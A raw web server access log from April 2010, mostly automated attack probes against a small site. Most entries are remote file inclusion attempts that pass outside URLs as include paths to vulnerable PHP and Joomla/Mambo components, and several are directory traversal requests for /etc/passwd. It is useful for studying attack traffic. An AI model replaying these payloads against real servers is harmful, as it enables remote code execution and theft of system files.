116.122.36.61 - - [16/Apr/2010:01:27:53 -0500] "GET /logs/access_log.1268265600%20%20//components/com_simpleboard/file_upload.php?sbp=http://solid.go.ro/d1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
78.110.50.121 - - [16/Apr/2010:01:30:20 -0500] "GET /logs//mambots/content/multithumb/slimbox/css///components/com_sef/sef.php?mosConfig.absolute.path=http://tawatec.su/xmlrpc/AinuLid1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
78.110.50.121 - - [16/Apr/2010:01:30:20 -0500] "GET //mambots/content/multithumb/slimbox/css///components/com_sef/sef.php?mosConfig.absolute.path=http://tawatec.su/xmlrpc/AinuLid1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
78.110.50.121 - - [16/Apr/2010:01:30:20 -0500] "GET /logs/access_log.1219708800//mambots/content/multithumb/slimbox/css///components/com_sef/sef.php?mosConfig.absolute.path=http://tawatec.su/xmlrpc/AinuLid1.txt?? HTTP/1.1" 404 379 "-""Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:33:27 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:33:27 -0500] "GET /logs/access_log.1230076800//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:33:27 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
207.46.204.192 - - [16/Apr/2010:01:33:32 -0500] "GET /costume/thmb5.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [16/Apr/2010:01:33:50 -0500] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:33:50 -0500] "GET /logs/access_log.1230076800//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:33:50 -0500] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:01:35:49 -0500] "GET /logs/access_log.1219536000//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
211.55.232.50 - - [16/Apr/2010:01:37:38 -0500] "GET //?INCLUDE_FOLDER../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.65"
74.200.89.25 - - [16/Apr/2010:01:38:05 -0500] "GET /logs/solpot.html?body=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:38:05 -0500] "GET /solpot.html?body=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:38:05 -0500] "GET /logs/access_log.1262476800/solpot.html?body=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:38:05 -0500] "GET /logs/access_log.1259020800/solpot.html?body=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:38:25 -0500] "GET /solpot.html?body=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 295 "-""Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:38:25 -0500] "GET /logs/solpot.html?body=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:38:25 -0500] "GET /logs/access_log.1262476800/solpot.html?body=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.200.89.25 - - [16/Apr/2010:01:38:25 -0500] "GET /logs/access_log.1259020800/solpot.html?body=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
211.55.232.50 - - [16/Apr/2010:01:39:06 -0500] "GET /logs/access_log.1217462400//?INCLUDE_FOLDER../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-""libwww-perl/5.65"
211.55.232.50 - - [16/Apr/2010:01:39:07 -0500] "GET //?INCLUDE_FOLDER../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.65"
211.55.232.50 - - [16/Apr/2010:01:39:08 -0500] "GET /logs//?INCLUDE_FOLDER../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1953 "-""libwww-perl/5.65"
222.236.47.182 - - [16/Apr/2010:01:41:57 -0500] "GET /logs/access_log.1219536000//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
211.55.232.50 - - [16/Apr/2010:01:43:12 -0500] "GET //?mosConfig.absolute.path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.65"
89.111.188.218 - - [16/Apr/2010:01:44:28 -0500] "GET //ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
65.55.207.21 - - [16/Apr/2010:01:45:53 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.129.170.49 - - [16/Apr/2010:01:48:47 -0500] "GET /logs/access_log.1219708800%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:01:48:47 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:01:48:47 -0500] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:01:48:50 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:01:48:50 -0500] "GET /logs/access_log.1219708800%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 352 "-""Mozilla/5.0"
118.129.170.49 - - [16/Apr/2010:01:48:50 -0500] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.cdtsomme.org//components/com_artforms/assets/captcha/includes/captchatalk/Oid1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
189.78.119.115 - - [16/Apr/2010:01:51:50 -0500] "GET //ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
66.235.124.76 - - [16/Apr/2010:01:52:18 -0500] "GET /tattoo/set4.htm HTTP/1.0" 200 1600 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
84.40.30.37 - - [16/Apr/2010:01:53:11 -0500] "GET /logs/access_log.1259020800//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:53:11 -0500] "GET //include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:53:11 -0500] "GET /logs/access_log.1238112000//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:53:11 -0500] "GET /logs//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:53:59 -0500] "GET //include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:53:59 -0500] "GET /logs//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:53:59 -0500] "GET /logs/access_log.1238112000//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
84.40.30.37 - - [16/Apr/2010:01:53:59 -0500] "GET /logs/access_log.1259020800//include/scripts/export_batch.inc.php?DIR=http://dive2world.com/newdive/1.txt? HTTP/1.1" 404 348 "-""Mozilla/5.0"
89.111.188.218 - - [16/Apr/2010:01:54:00 -0500] "GET /logs/access_log.1207180800//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
89.111.188.218 - - [16/Apr/2010:01:54:01 -0500] "GET //ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
89.111.188.218 - - [16/Apr/2010:01:54:01 -0500] "GET /logs//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
174.133.122.210 - - [16/Apr/2010:01:59:26 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:01:59:26 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:01:59:26 -0500] "GET /logs/access_log.1219708800//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
118.220.174.202 - - [16/Apr/2010:02:00:34 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
118.220.174.202 - - [16/Apr/2010:02:00:34 -0500] "GET //include/admin.lib.inc.php?site_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
118.220.174.202 - - [16/Apr/2010:02:00:34 -0500] "GET /logs/access_log.1219708800//include/admin.lib.inc.php?site_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
189.78.119.115 - - [16/Apr/2010:02:01:47 -0500] "GET /logs//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
189.78.119.115 - - [16/Apr/2010:02:01:48 -0500] "GET //ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
118.220.174.202 - - [16/Apr/2010:02:10:22 -0500] "GET /logs/access_log.1219708800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 384 "-""Mozilla/5.0"
118.220.174.202 - - [16/Apr/2010:02:10:22 -0500] "GET /logs/access_log.1220054400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 384 "-""Mozilla/5.0"
118.220.174.202 - - [16/Apr/2010:02:10:22 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
118.220.174.202 - - [16/Apr/2010:02:10:22 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
203.19.4.18 - - [16/Apr/2010:02:11:25 -0500] "GET //ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
174.133.122.210 - - [16/Apr/2010:02:12:51 -0500] "GET /logs/access_log.1219708800//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:02:12:51 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:02:12:51 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
89.111.188.218 - - [16/Apr/2010:02:13:36 -0500] "GET /logs/access_log.1210291200//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
89.111.188.218 - - [16/Apr/2010:02:13:36 -0500] "GET //ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
89.111.188.218 - - [16/Apr/2010:02:13:37 -0500] "GET /logs//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
62.149.228.44 - - [16/Apr/2010:02:14:55 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.149.228.44 - - [16/Apr/2010:02:14:55 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
62.149.228.44 - - [16/Apr/2010:02:14:55 -0500] "GET /logs/access_log.1219708800%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
62.149.228.44 - - [16/Apr/2010:02:15:04 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
62.149.228.44 - - [16/Apr/2010:02:15:04 -0500] "GET /logs/access_log.1219708800%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
62.149.228.44 - - [16/Apr/2010:02:15:04 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
211.55.232.50 - - [16/Apr/2010:02:16:42 -0500] "GET /logs/access_log.1268265600//?index.php?mosConfig_absolute_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-""libwww-perl/5.65"
211.55.232.50 - - [16/Apr/2010:02:16:42 -0500] "GET //?index.php?mosConfig_absolute_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.65"
211.55.232.50 - - [16/Apr/2010:02:16:43 -0500] "GET /logs//?index.php?mosConfig_absolute_path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1953 "-""libwww-perl/5.65"
174.133.122.210 - - [16/Apr/2010:02:18:24 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:02:18:24 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:02:18:24 -0500] "GET /logs/access_log.1219708800//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.149.228.44 - - [16/Apr/2010:02:19:07 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
62.149.228.44 - - [16/Apr/2010:02:19:07 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.149.228.44 - - [16/Apr/2010:02:19:07 -0500] "GET /logs/access_log.1219708800//modules/TotalCalendar/about.php?inc_dir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
66.249.71.153 - - [16/Apr/2010:02:20:57 -0500] "GET /costume/007_JPG%20copy.jpg HTTP/1.1" 200 43100 "-""Googlebot-Image/1.0"
66.249.71.153 - - [16/Apr/2010:02:20:57 -0500] "GET /costume/011_JPG%20copy.jpg HTTP/1.1" 200 46554 "-""Googlebot-Image/1.0"
66.249.71.153 - - [16/Apr/2010:02:20:58 -0500] "GET /costume/003_JPG%20copy.jpg HTTP/1.1" 200 50590 "-""Googlebot-Image/1.0"
66.249.71.153 - - [16/Apr/2010:02:20:59 -0500] "GET /costume/001_JPG%20copy.jpg HTTP/1.1" 200 46065 "-""Googlebot-Image/1.0"
66.249.71.153 - - [16/Apr/2010:02:21:01 -0500] "GET /costume/009_JPG%20copy.jpg HTTP/1.1" 200 47583 "-""Googlebot-Image/1.0"
66.249.71.153 - - [16/Apr/2010:02:21:02 -0500] "GET /costume/005_JPG%20copy.jpg HTTP/1.1" 200 44973 "-""Googlebot-Image/1.0"
66.249.71.153 - - [16/Apr/2010:02:21:04 -0500] "GET /costume/004_JPG%20copy.jpg HTTP/1.1" 200 44129 "-""Googlebot-Image/1.0"
189.78.119.115 - - [16/Apr/2010:02:21:05 -0500] "GET /logs/access_log.1207180800//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
66.249.71.153 - - [16/Apr/2010:02:21:06 -0500] "GET /costume/010_jpg%20copy.jpg HTTP/1.1" 200 47369 "-""Googlebot-Image/1.0"
66.249.71.153 - - [16/Apr/2010:02:21:07 -0500] "GET /costume/002_JPG%20copy.jpg HTTP/1.1" 200 44353 "-""Googlebot-Image/1.0"
189.78.119.115 - - [16/Apr/2010:02:21:07 -0500] "GET //ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
66.249.71.153 - - [16/Apr/2010:02:21:07 -0500] "GET /costume/006_JPG%20copy.jpg HTTP/1.1" 200 49320 "-""Googlebot-Image/1.0"
66.249.71.153 - - [16/Apr/2010:02:21:08 -0500] "GET /costume/012_JPG%20copy.jpg HTTP/1.1" 200 43366 "-""Googlebot-Image/1.0"
189.78.119.115 - - [16/Apr/2010:02:21:08 -0500] "GET /logs//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
66.249.71.153 - - [16/Apr/2010:02:21:08 -0500] "GET /costume/008_JPG%20copy.jpg HTTP/1.1" 200 43767 "-""Googlebot-Image/1.0"
62.149.228.44 - - [16/Apr/2010:02:21:30 -0500] "GET /logs/access_log.1268265600//modules/TotalCalendar/about.php?inc_dir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
62.149.228.44 - - [16/Apr/2010:02:21:30 -0500] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
62.149.228.44 - - [16/Apr/2010:02:21:30 -0500] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.aktivhotel-veronika.at/mambots/editors/jce/jscripts/tiny_mce/plugins/fireboard/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:02:27:29 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:02:27:29 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:02:27:29 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.88.4.141 - - [16/Apr/2010:02:27:38 -0500] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
121.88.4.141 - - [16/Apr/2010:02:27:38 -0500] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
121.88.4.141 - - [16/Apr/2010:02:27:38 -0500] "GET /logs/access_log.1219708800///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 384 "-""Mozilla/5.0"
121.88.4.141 - - [16/Apr/2010:02:27:38 -0500] "GET /logs/access_log.1220054400///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 384 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:02:29:37 -0500] "GET //dl//inc/download_center_lite.inc.php?script_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:02:29:37 -0500] "GET /logs/access_log.1268611200%20%20//dl//inc/download_center_lite.inc.php?script_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:02:29:37 -0500] "GET /logs//dl//inc/download_center_lite.inc.php?script_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
200.201.180.130 - - [16/Apr/2010:02:30:00 -0500] "GET /logs/index.php?file= HTTP/1.1" 404 298 "-""-"
67.222.152.66 - - [16/Apr/2010:02:30:04 -0500] "GET /logs/access_log.1219363200%20%20//dl//inc/download_center_lite.inc.php?script_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:02:30:07 -0500] "GET /logs//dl//inc/download_center_lite.inc.php?script_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:02:30:07 -0500] "GET /logs/access_log.1268611200%20%20//dl//inc/download_center_lite.inc.php?script_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:02:30:07 -0500] "GET //dl//inc/download_center_lite.inc.php?script_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
200.201.180.130 - - [16/Apr/2010:02:30:22 -0500] "GET /index.php?file= HTTP/1.1" 404 293 "-""-"
211.55.232.50 - - [16/Apr/2010:02:30:28 -0500] "GET /logs/access_log.1268956800//?mosConfig.absolute.path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 312 "-""libwww-perl/5.65"
211.55.232.50 - - [16/Apr/2010:02:30:28 -0500] "GET //?mosConfig.absolute.path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.65"
211.55.232.50 - - [16/Apr/2010:02:30:29 -0500] "GET /logs//?mosConfig.absolute.path../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 1953 "-""libwww-perl/5.65"
67.222.152.66 - - [16/Apr/2010:02:30:33 -0500] "GET /logs/access_log.1219363200%20%20//dl//inc/download_center_lite.inc.php?script_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
217.23.8.91 - - [16/Apr/2010:02:30:42 -0500] "GET /logs//dl//inc/download_center_lite.inc.php?script_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
217.23.8.91 - - [16/Apr/2010:02:30:42 -0500] "GET //dl//inc/download_center_lite.inc.php?script_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.23.8.91 - - [16/Apr/2010:02:30:42 -0500] "GET /logs/access_log.1268611200%20%20//dl//inc/download_center_lite.inc.php?script_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
217.23.8.91 - - [16/Apr/2010:02:30:45 -0500] "GET /logs/access_log.1219363200%20%20//dl//inc/download_center_lite.inc.php?script_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
217.23.8.91 - - [16/Apr/2010:02:31:06 -0500] "GET //dl//inc/download_center_lite.inc.php?script_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.23.8.91 - - [16/Apr/2010:02:31:06 -0500] "GET /logs//dl//inc/download_center_lite.inc.php?script_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
217.23.8.91 - - [16/Apr/2010:02:31:06 -0500] "GET /logs/access_log.1268611200%20%20//dl//inc/download_center_lite.inc.php?script_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
217.23.8.91 - - [16/Apr/2010:02:31:09 -0500] "GET /logs/access_log.1219363200%20%20//dl//inc/download_center_lite.inc.php?script_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:02:31:53 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:02:31:53 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:02:31:53 -0500] "GET /logs/access_log.1219708800%20%20//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
89.111.188.218 - - [16/Apr/2010:02:32:49 -0500] "GET /logs/access_log.1210291200//ws/login.php?noSet=0&includedir=http://www.actualtv.ro/txtsql/data/a.jpg??? HTTP/1.1" 404 324 "-""libwww-perl/5.805"
